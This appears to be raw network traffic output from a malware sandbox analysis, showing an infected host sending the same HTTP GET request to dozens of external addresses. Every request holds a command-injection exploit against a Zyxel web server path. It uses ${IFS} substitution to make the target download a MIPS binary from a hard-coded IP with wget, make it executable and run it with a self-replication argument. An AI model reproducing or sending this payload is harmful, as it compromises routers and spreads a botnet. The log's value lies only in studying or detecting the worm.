                                                  Jan 19, 2024 18:23:57.086668015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4828192.168.2.134142227.155.83.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086699009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4829192.168.2.1333102202.3.150.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086734056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4830192.168.2.133283413.76.48.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.086776018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4831192.168.2.1353026109.248.108.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098134041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4832192.168.2.1332858204.105.37.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098181009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4833192.168.2.1355260158.87.13.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098201990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4834192.168.2.1336418129.190.41.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098257065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4835192.168.2.134824882.230.220.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098301888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4836192.168.2.1348074138.81.198.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098325014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4837192.168.2.1342708106.150.18.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098371029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4838192.168.2.135126617.88.207.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098436117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4839192.168.2.135075094.251.171.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098468065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4840192.168.2.1352900154.245.236.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098519087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4841192.168.2.135421483.100.122.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098552942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4842192.168.2.1360434140.118.219.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098581076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4843192.168.2.1355550206.17.250.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098628044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4844192.168.2.1345756142.206.100.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098675966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4845192.168.2.135251691.89.101.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098705053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4846192.168.2.135846069.42.50.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098757029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4847192.168.2.1333806173.2.237.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098782063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4848192.168.2.1359552134.140.183.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098838091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4849192.168.2.1344156102.146.199.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098896980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4850192.168.2.1354488168.119.183.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098925114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4851192.168.2.1343628206.94.246.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098953009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4852192.168.2.134843096.55.162.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.098990917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4853192.168.2.1335664176.35.16.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099025965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4854192.168.2.1347172148.42.168.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099061012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4855192.168.2.135276062.153.241.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099112034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4856192.168.2.1353506188.212.220.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099134922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4857192.168.2.133884049.143.179.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099196911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4858192.168.2.1342732112.157.179.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099229097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4859192.168.2.133533658.231.49.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099273920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4860192.168.2.1334962178.11.38.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099309921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4861192.168.2.135601825.53.115.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099350929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4862192.168.2.1347864216.172.185.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099385977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4863192.168.2.1354660107.77.159.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099431038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4864192.168.2.135248673.47.178.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099484921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4865192.168.2.136040488.8.77.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099539995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4866192.168.2.1359974192.120.126.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099571943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4867192.168.2.133343681.248.189.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099575996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4868192.168.2.133967624.197.120.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099638939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4869192.168.2.135235823.63.51.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099674940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4870192.168.2.1344540212.33.207.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099699974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4871192.168.2.1357616100.191.154.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099725962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4872192.168.2.1335896172.82.55.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099780083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4873192.168.2.1350862174.40.106.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099806070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4874192.168.2.135955471.56.18.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099848032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4875192.168.2.135687678.254.65.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099885941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4876192.168.2.1341768136.159.29.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099932909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4877192.168.2.1352038208.195.129.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.099989891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4878192.168.2.136038693.69.185.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100024939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4879192.168.2.1345866199.51.106.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100060940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4880192.168.2.1358618130.27.250.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100095034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4881192.168.2.135470083.98.215.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100135088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4882192.168.2.1334254144.20.96.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100168943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4883192.168.2.1355718131.128.166.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100208044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4884192.168.2.1336756221.182.75.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100261927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4885192.168.2.1333550165.237.44.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100306988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4886192.168.2.135377640.203.75.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100322962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4887192.168.2.1354274114.62.4.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100351095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4888192.168.2.135943070.53.191.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100416899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4889192.168.2.1333286195.161.149.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100444078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4890192.168.2.1340808191.250.125.34443
                                                  TimestampBytes transferredDirectionData
